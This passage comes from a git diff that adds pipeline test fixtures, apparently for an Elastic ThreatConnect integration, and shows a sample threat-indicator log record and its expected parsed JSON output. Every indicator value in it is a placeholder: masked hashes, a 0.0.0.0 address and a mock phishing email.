true,"lastModified": "2021-10-21T19:54:59Z","legacyLink": "https://app.threatconnect.com/auth/document/document.xhtml?document=10","to": "demo@sample.com","from": "auto-confirm@bad.com","subject": "YourAmazon.comorderfordemo@sample.com","header": "emailheadergoeshere","body": "Pleasevisitbad.comtoseeyourorderandgiveusallyourmoney","scoreIncludesBody": true,"emailDate": "2021-09-17T12:50:19Z","scoreBreakdown": "RuleSPFNeutralwasmatchedagainst'neutral'.","eventDate": "2021-09-17T12:50:19Z","status": "New","publishDate": "2021-09-17T12:50:19Z","fileText": "Filetext","assignments": {"data": [{"type": "Assigned","user": {"id": 12}}]},"dueDate": "2021-09-17T12:50:19Z","escalationDate": "2021-09-17T12:50:19Z","reminderDate": "2021-09-17T12:50:19Z","externalDateAdded": "2021-09-17T12:50:19Z","externalDateExpires": "2021-09-17T12:50:19Z","externalLastModified": "2021-09-17T12:50:19Z","firstSeen": "2021-09-17T12:50:19Z","lastSeen": "2021-09-17T12:50:19Z","xid": "a1a1a1a1-a1a1-a1a1-a1a1-a1a1a1a1a1a1","upVote": false,"fileName": "indicators.txt","fileSize": 36,"documentType": "Text","documentDateAdded": "2021-10-21T19:54:59Z","fileType": "Hash"}]},"associatedIndicators": {"data": [{"lastModified": "2021-11-02T13:07:08Z","description": "A bad email found","Subject": "Spam","id": 10,"md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","size": 124,"Block": "0.0.0.0","hostName": "samplehost","type": "File","summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE","confidence": 20,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/test_pc.html","Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","address": "johnxyz@newnime.com","User Agent String": "PostmanRuntime/7.32.3","ownerId": 1,"ownerName": "DemoOrganization","dateAdded": "2021-11-02T13:07:08Z","webLink": "https://app.threatconnect.com/#/details/indicators/10/overview","privateFlag": false,"active": true,"activeLocked": false,"legacyLink": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization","Hashtag": "#testabc","rating": 3,"Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z"},{"lastModified": "2021-11-02T13:07:08Z","description": "A bad email found","Subject": "Spam","id": 11,"md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","size": "124","Block": "0.0.0.0/8","hostName": "samplehost","type": "File","summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE","confidence": 20,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/test_pc.html","Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","address": "johnxyz@newnime.com","User Agent String": "PostmanRuntime/7.32.3","ownerId": 1,"ownerName": "DemoOrganization","dateAdded": "2021-11-02T13:07:08Z","webLink": "https://app.threatconnect.com/#/details/indicators/10/overview","privateFlag": false,"active": true,"activeLocked": false,"legacyLink": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization","Hashtag": "#testabc","rating": 3,"Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z"},{"lastModified": "2021-11-02T13:07:08Z","description": "A bad email found","Subject": "Spam","id": 12,"md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","size": "124","Block": "0.0.0.0/125","hostName": "samplehost","type": "File","summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE","confidence": 20,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/test_pc.html","Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","address": "johnxyz@newnime.com","User Agent String": "PostmanRuntime/7.32.3","ownerId": 1,"ownerName": "DemoOrganization","dateAdded": "2021-11-02T13:07:08Z","webLink": "https://app.threatconnect.com/#/details/indicators/10/overview","privateFlag": false,"active": true,"activeLocked": false,"legacyLink": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization","Hashtag": "#testabc","rating": 3,"Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z"}]},"attributes": {"data": [{"id": 6843246,"dateAdded": "2023-08-25T13:16:12Z","type": "EmailAddressUsage","value": "PhishingEmailSender","createdBy": {"id": 69,"userName": "johnxys@abc.co","firstName": "John","lastName": "Smith","pseudonym": "JohnS","owner": "Elastic"},"lastModified": "2023-08-25T13:16:12Z","pinned": false,"default": false}]},"address": "hohnabc@xyz.com","legacyLink": "https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic","associatedArtifacts": {"data": [{"id": 12345}]},"associatedCases": {"data": [{"id": 123457}]},"fileActions": {"data": [{"id": 123456}]},"fileOccurrences": {"data": [{"fileName": "win999301.dll","path": "C:\\Windows\\System","date": "2022-06-14T10:00:00Z"}]},"customAssociations": {"data": [{"id": 123458}]},"dnsResolution": {"data": [{"id": 123459}]},"enrichment": {"data": [{"id": 123455}]},"falsePositives": 1,"lastFalsePositive": "2023-10-04T12:34:56Z","falsePositiveReportedByUser": false,"genericCustomIndicatorValues": {"data": [{"id": 1234551}]},"geoLocation": {"data": [{"id": 1234552}]},"investigationLinks": {"data": [{"id": 1234553}]},"observations": {"data": [{"id": 1234556}]},"trackedUsers": {"data": [{"id": 1234557}]},"whoIs": {"data": [{"id": 1234558}]}} diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log-expected.json b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log-expected.json new file mode 100644 index 00000000000..6608d11900c --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log-expected.json @@ -0,0 +1,553 @@ +{ + "expected": [ + { + "@timestamp": "2023-12-01T08:26:48.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "auto-confirm@bad.com" + ] + }, + "subject": "Spam", + "to": { + "address": [ + "demo@sample.com" + ] + } + }, + "event": { + "category": [ + "threat" + ], + "id": "johnbae@poverts.com", + "kind": "enrichment", + "original": "{\"id\": 891599,\"dateAdded\": \"2023-08-25T12:57:24Z\",\"description\": \"bad email\",\"securityLabels\": {\"data\": [{\"id\": 3,\"name\": \"TLP:AMBER\",\"source\": \"https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxPSW5XjQ\",\"description\": \"Thissecuritylabelisusedforinformationthatrequiressupporttobeeffectivelyactedupon,yetcarriesriskstoprivacy,reputation,oroperationsifsharedoutsideoftheorganizationsinvolved.Informationwiththislabelcanbesharedwithmembersofanorganizationanditsclients.\",\"color\": \"FFC000\",\"owner\": \"System\",\"dateAdded\": \"2016-08-31T00:00:00Z\"}]},\"ownerId\": 51,\"ownerName\": \"Elastic\",\"webLink\": \"https://partnerstage-intel.threatconnect.com/\",\"tags\": {\"data\": [{\"id\": 1,\"name\": \"userexecution:maliciouslink\",\"lastUsed\": \"2023-08-25T13:15:30Z\",\"description\": \"ApplythisTagtoobjectsrelatedtoransomwareattacks\",\"owner\": \"Demoorganization\",\"techniqueId\": \"T1055.005\",\"platforms\": {\"data\": [\"Windows\"],\"count\": 1}}]},\"type\": \"EmailAddress\",\"lastModified\": \"2023-12-01T08:26:48Z\",\"rating\": 3,\"confidence\": 61,\"threatAssessRating\": 3,\"threatAssessConfidence\": 61,\"threatAssessScore\": 382,\"threatAssessScoreObserved\": 0,\"threatAssessScoreFalsePositive\": 0,\"summary\": \"johnbae@poverts.com\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"md5\": \"F5A2496CF66CXXCFFE66CXXB27D7XXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"hostName\": \"samplehost\",\"size\": 123,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/tes_pc.html\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\",\"Hashtag\": \"#testabc\",\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"Subject\": \"Spam\",\"source\": \"https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxXXXXX\",\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"Block\": \"0.0.0.0\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"associatedGroups\": {\"data\": [{\"id\": 6,\"ownerId\": 51,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-03T14:57:45Z\",\"webLink\": \"https://app.threatconnect.com/#/details/groups/3/overview\",\"type\": \"Incident\",\"name\": \"BadIncident\",\"createdBy\": {\"userName\": \"johnsmithxyz@gmail.com\",\"firstName\": \"john\",\"lastName\": \"smith\",\"pseudonym\": \"jsmithAPI\",\"owner\": \"DemoOrganization\",\"id\": 3},\"upVoteCount\": \"0\",\"downVoteCount\": \"0\",\"generatedReport\": true,\"password\": \"duwyhfsjhsi\",\"malware\": true,\"lastModified\": \"2021-10-21T19:54:59Z\",\"legacyLink\": \"https://app.threatconnect.com/auth/document/document.xhtml?document=10\",\"to\": \"demo@sample.com\",\"from\": \"auto-confirm@bad.com\",\"subject\": \"YourAmazon.comorderfordemo@sample.com\",\"header\": \"emailheadergoeshere\",\"body\": \"Pleasevisitbad.comtoseeyourorderandgiveusallyourmoney\",\"scoreIncludesBody\": true,\"emailDate\": \"2021-09-17T12:50:19Z\",\"scoreBreakdown\": \"RuleSPFNeutralwasmatchedagainst'neutral'.\",\"eventDate\": \"2021-09-17T12:50:19Z\",\"status\": \"New\",\"publishDate\": \"2021-09-17T12:50:19Z\",\"fileText\": \"Filetext\",\"assignments\": {\"data\": [{\"type\": \"Assigned\",\"user\": {\"id\": 12}}]},\"dueDate\": \"2021-09-17T12:50:19Z\",\"escalationDate\": \"2021-09-17T12:50:19Z\",\"reminderDate\": \"2021-09-17T12:50:19Z\",\"externalDateAdded\": \"2021-09-17T12:50:19Z\",\"externalDateExpires\": \"2021-09-17T12:50:19Z\",\"externalLastModified\": \"2021-09-17T12:50:19Z\",\"firstSeen\": \"2021-09-17T12:50:19Z\",\"lastSeen\": \"2021-09-17T12:50:19Z\",\"xid\": \"a1a1a1a1-a1a1-a1a1-a1a1-a1a1a1a1a1a1\",\"upVote\": false,\"fileName\": \"indicators.txt\",\"fileSize\": 36,\"documentType\": \"Text\",\"documentDateAdded\": \"2021-10-21T19:54:59Z\",\"fileType\": \"Hash\"}]},\"associatedIndicators\": {\"data\": [{\"lastModified\": \"2021-11-02T13:07:08Z\",\"description\": \"A bad email found\",\"Subject\": \"Spam\",\"id\": 10,\"md5\": \"F5A2496CF66CB8CFFE66CB1B27DXXXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"size\": 124,\"Block\": \"0.0.0.0\",\"hostName\": \"samplehost\",\"type\": \"File\",\"summary\": \"F5A2496CF66CB8CFFE66CB1B27D7DEDE\",\"confidence\": 20,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/test_pc.html\",\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"address\": \"johnxyz@newnime.com\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"ownerId\": 1,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-02T13:07:08Z\",\"webLink\": \"https://app.threatconnect.com/#/details/indicators/10/overview\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"legacyLink\": \"https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization\",\"Hashtag\": \"#testabc\",\"rating\": 3,\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\"},{\"lastModified\": \"2021-11-02T13:07:08Z\",\"description\": \"A bad email found\",\"Subject\": \"Spam\",\"id\": 11,\"md5\": \"F5A2496CF66CB8CFFE66CB1B27DXXXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"size\": \"124\",\"Block\": \"0.0.0.0/8\",\"hostName\": \"samplehost\",\"type\": \"File\",\"summary\": \"F5A2496CF66CB8CFFE66CB1B27D7DEDE\",\"confidence\": 20,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/test_pc.html\",\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"address\": \"johnxyz@newnime.com\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"ownerId\": 1,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-02T13:07:08Z\",\"webLink\": \"https://app.threatconnect.com/#/details/indicators/10/overview\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"legacyLink\": \"https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization\",\"Hashtag\": \"#testabc\",\"rating\": 3,\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\"},{\"lastModified\": \"2021-11-02T13:07:08Z\",\"description\": \"A bad email found\",\"Subject\": \"Spam\",\"id\": 12,\"md5\": \"F5A2496CF66CB8CFFE66CB1B27DXXXXX\",\"sha256\": \"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX\",\"sha1\": \"samplesha1\",\"size\": \"124\",\"Block\": \"0.0.0.0/125\",\"hostName\": \"samplehost\",\"type\": \"File\",\"summary\": \"F5A2496CF66CB8CFFE66CB1B27D7DEDE\",\"confidence\": 20,\"ip\": \"0.0.0.0\",\"text\": \"http://www.testingmcafeesites.com/test_pc.html\",\"Key Name\": \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\Setup\\\\Status\\\\ChildCompletion\",\"Value Name\": \"0\",\"Value Type\": \"REG_QWORD\",\"AS Number\": \"ASN1234\",\"address\": \"johnxyz@newnime.com\",\"User Agent String\": \"PostmanRuntime/7.32.3\",\"ownerId\": 1,\"ownerName\": \"DemoOrganization\",\"dateAdded\": \"2021-11-02T13:07:08Z\",\"webLink\": \"https://app.threatconnect.com/#/details/indicators/10/overview\",\"privateFlag\": false,\"active\": true,\"activeLocked\": false,\"legacyLink\": \"https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization\",\"Hashtag\": \"#testabc\",\"rating\": 3,\"Mutex\": \"Test.Mutex()\",\"dnsActive\": false,\"whoisActive\": true,\"externalDateAdded\": \"2023-10-04T12:34:56Z\",\"externalDateExpires\": \"2023-10-04T12:34:56Z\",\"externalLastModified\": \"2023-10-04T12:34:56Z\",\"firstSeen\": \"2023-10-04T12:34:56Z\",\"lastSeen\": \"2023-10-04T12:34:56Z\"}]},\"attributes\": {\"data\": [{\"id\": 6843246,\"dateAdded\": \"2023-08-25T13:16:12Z\",\"type\": \"EmailAddressUsage\",\"value\": \"PhishingEmailSender\",\"createdBy\": {\"id\": 69,\"userName\": \"johnxys@abc.co\",\"firstName\": \"John\",\"lastName\": \"Smith\",\"pseudonym\": \"JohnS\",\"owner\": \"Elastic\"},\"lastModified\": \"2023-08-25T13:16:12Z\",\"pinned\": false,\"default\": false}]},\"address\": \"hohnabc@xyz.com\",\"legacyLink\": \"https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic\",\"associatedArtifacts\": {\"data\": [{\"id\": 12345}]},\"associatedCases\": {\"data\": [{\"id\": 123457}]},\"fileActions\": {\"data\": [{\"id\": 123456}]},\"fileOccurrences\": {\"data\": [{\"fileName\": \"win999301.dll\",\"path\": \"C:\\\\Windows\\\\System\",\"date\": \"2022-06-14T10:00:00Z\"}]},\"customAssociations\": {\"data\": [{\"id\": 123458}]},\"dnsResolution\": {\"data\": [{\"id\": 123459}]},\"enrichment\": {\"data\": [{\"id\": 123455}]},\"falsePositives\": 1,\"lastFalsePositive\": \"2023-10-04T12:34:56Z\",\"falsePositiveReportedByUser\": false,\"genericCustomIndicatorValues\": {\"data\": [{\"id\": 1234551}]},\"geoLocation\": {\"data\": [{\"id\": 1234552}]},\"investigationLinks\": {\"data\": [{\"id\": 1234553}]},\"observations\": {\"data\": [{\"id\": 1234556}]},\"trackedUsers\": {\"data\": [{\"id\": 1234557}]},\"whoIs\": {\"data\": [{\"id\": 1234558}]}}", + "type": [ + "indicator" + ] + }, + "observer": { + "hostname": "samplehost" + }, + "os": { + "family": [ + "Windows" + ] + }, + "related": { + "hash": [ + "F5A2496CF66CXXCFFE66CXXB27D7XXXX", + "samplesha1", + "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX" + ], + "hosts": [ + "samplehost" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "hohnabc", + "john", + "smith", + "johnsmithxyz@gmail.com", + "John", + "Smith", + "johnxys@abc.co" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "indicator": { + "as": { + "number": 1234 + }, + "confidence": "Medium", + "description": "bad email", + "email": { + "address": "hohnabc@xyz.com" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "marking": { + "tlp": [ + "AMBER" + ] + }, + "modified_at": "2023-10-04T12:34:56.000Z", + "provider": "ThreatConnect", + "reference": [ + "https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic", + "https://partnerstage-intel.threatconnect.com/" + ], + "type": [ + "email-addr" + ] + }, + "technique": { + "id": [ + "T1055.005" + ] + } + }, + "threat_connect": { + "indicator": { + "active": { + "locked": false, + "value": true + }, + "address": "hohnabc@xyz.com", + "as_number": "ASN1234", + "associated_artifacts": { + "data": [ + { + "id": 12345 + } + ] + }, + "associated_cases": { + "data": [ + { + "id": 123457 + } + ] + }, + "associated_groups": { + "data": [ + { + "assignments": { + "data": [ + { + "type": "Assigned", + "user": { + "id": "12" + } + } + ] + }, + "body": "Pleasevisitbad.comtoseeyourorderandgiveusallyourmoney", + "created_by": { + "first_name": "john", + "id": "3", + "last_name": "smith", + "owner": "DemoOrganization", + "pseudonym": "jsmithAPI", + "user_name": "johnsmithxyz@gmail.com" + }, + "date_added": "2021-11-03T14:57:45.000Z", + "document": { + "date_added": "2021-10-21T19:54:59.000Z", + "type": "Text" + }, + "down_vote_count": "0", + "due_date": "2021-09-17T12:50:19.000Z", + "email_date": "2021-09-17T12:50:19.000Z", + "escalation_date": "2021-09-17T12:50:19.000Z", + "event_date": "2021-09-17T12:50:19.000Z", + "external": { + "date": { + "added": "2021-09-17T12:50:19.000Z", + "expires": "2021-09-17T12:50:19.000Z" + }, + "last_modified": "2021-09-17T12:50:19.000Z" + }, + "file": { + "name": "indicators.txt", + "size": "36", + "text": "Filetext", + "type": "Hash" + }, + "first_seen": "2021-09-17T12:50:19.000Z", + "generated_report": true, + "header": "emailheadergoeshere", + "id": "6", + "last_modified": "2021-10-21T19:54:59.000Z", + "last_seen": "2021-09-17T12:50:19.000Z", + "legacy_link": "https://app.threatconnect.com/auth/document/document.xhtml?document=10", + "malware": true, + "name": "BadIncident", + "owner": { + "id": "51", + "name": "DemoOrganization" + }, + "password": "duwyhfsjhsi", + "publish_date": "2021-09-17T12:50:19.000Z", + "reminder_date": "2021-09-17T12:50:19.000Z", + "score_breakdown": "RuleSPFNeutralwasmatchedagainst'neutral'.", + "score_includes_body": true, + "status": "New", + "subject": "YourAmazon.comorderfordemo@sample.com", + "type": "Incident", + "up_vote": false, + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/3/overview", + "xid": "a1a1a1a1-a1a1-a1a1-a1a1-a1a1a1a1a1a1" + } + ] + }, + "associated_indicators": { + "data": [ + { + "active": { + "locked": false, + "value": true + }, + "address": "johnxyz@newnime.com", + "as_number": "ASN1234", + "block": "0.0.0.0", + "confidence": 20, + "date_added": "2021-11-02T13:07:08.000Z", + "description": "A bad email found", + "dns_active": false, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + }, + "last_modified": "2023-10-04T12:34:56.000Z" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "10", + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_modified": "2021-11-02T13:07:08.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization", + "md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX", + "mutex": "Test.Mutex()", + "owner": { + "id": "1", + "name": "DemoOrganization" + }, + "private_flag": false, + "rating": 3.0, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "124", + "subject": "Spam", + "summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE", + "text": "http://www.testingmcafeesites.com/test_pc.html", + "type": "File", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://app.threatconnect.com/#/details/indicators/10/overview", + "whois_active": true + }, + { + "active": { + "locked": false, + "value": true + }, + "address": "johnxyz@newnime.com", + "as_number": "ASN1234", + "block": "0.0.0.0/8", + "confidence": 20, + "date_added": "2021-11-02T13:07:08.000Z", + "description": "A bad email found", + "dns_active": false, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + }, + "last_modified": "2023-10-04T12:34:56.000Z" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "11", + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_modified": "2021-11-02T13:07:08.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization", + "md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX", + "mutex": "Test.Mutex()", + "owner": { + "id": "1", + "name": "DemoOrganization" + }, + "private_flag": false, + "rating": 3.0, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "124", + "subject": "Spam", + "summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE", + "text": "http://www.testingmcafeesites.com/test_pc.html", + "type": "File", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://app.threatconnect.com/#/details/indicators/10/overview", + "whois_active": true + }, + { + "active": { + "locked": false, + "value": true + }, + "address": "johnxyz@newnime.com", + "as_number": "ASN1234", + "block": "0.0.0.0/125", + "confidence": 20, + "date_added": "2021-11-02T13:07:08.000Z", + "description": "A bad email found", + "dns_active": false, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + }, + "last_modified": "2023-10-04T12:34:56.000Z" + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "12", + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_modified": "2021-11-02T13:07:08.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization", + "md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX", + "mutex": "Test.Mutex()", + "owner": { + "id": "1", + "name": "DemoOrganization" + }, + "private_flag": false, + "rating": 3.0, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "124", + "subject": "Spam", + "summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE", + "text": "http://www.testingmcafeesites.com/test_pc.html", + "type": "File", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://app.threatconnect.com/#/details/indicators/10/overview", + "whois_active": true + } + ] + }, + "attributes": { + "data": [ + { + "created_by": { + "first_name": "John", + "id": "69", + "last_name": "Smith", + "owner": "Elastic", + "pseudonym": "JohnS", + "user_name": "johnxys@abc.co" + }, + "date_added": "2023-08-25T13:16:12.000Z", + "default": false, + "id": "6843246", + "last_modified": "2023-08-25T13:16:12.000Z", + "pinned": false, + "type": "EmailAddressUsage", + "value": "PhishingEmailSender" + } + ] + }, + "block": "0.0.0.0", + "confidence": 61, + "custom_associations": { + "data": [ + { + "id": 123458 + } + ] + }, + "date_added": "2023-08-25T12:57:24.000Z", + "description": "bad email", + "dns_active": false, + "dns_resolution": { + "data": [ + { + "id": 123459 + } + ] + }, + "enrichment": { + "data": [ + { + "id": 123455 + } + ] + }, + "external": { + "date": { + "added": "2023-10-04T12:34:56.000Z", + "expires": "2023-10-04T12:34:56.000Z" + } + }, + "external_last": { + "modified": "2023-10-04T12:34:56.000Z" + }, + "false_positive_reported_by_user": false, + "false_positives": 1, + "file_actions": { + "data": [ + { + "id": 123456 + } + ] + }, + "file_occurrences": { + "data": [ + { + "date": "2022-06-14T10:00:00Z", + "fileName": "win999301.dll", + "path": "C:\\Windows\\System" + } + ] + }, + "first_seen": "2023-10-04T12:34:56.000Z", + "generic_custom_indicator_values": { + "data": [ + { + "id": 1234551 + } + ] + }, + "geo_location": { + "data": [ + { + "id": 1234552 + } + ] + }, + "hashtag": "#testabc", + "host_name": "samplehost", + "id": "891599", + "investigation_links": { + "data": [ + { + "id": 1234553 + } + ] + }, + "ip": "0.0.0.0", + "key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion", + "last_false_positive": "2023-10-04T12:34:56.000Z", + "last_modified": "2023-12-01T08:26:48.000Z", + "last_seen": "2023-10-04T12:34:56.000Z", + "legacy_link": "https://partnerstage-intel.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=misoyil388%40poverts.com&owner=Elastic", + "md5": "F5A2496CF66CXXCFFE66CXXB27D7XXXX", + "mutex": "Test.Mutex()", + "observations": { + "data": [ + { + "id": 1234556 + } + ] + }, + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "rating": 3.0, + "security_labels": { + "data": [ + { + "color": "FFC000", + "date_added": "2016-08-31T00:00:00.000Z", + "description": 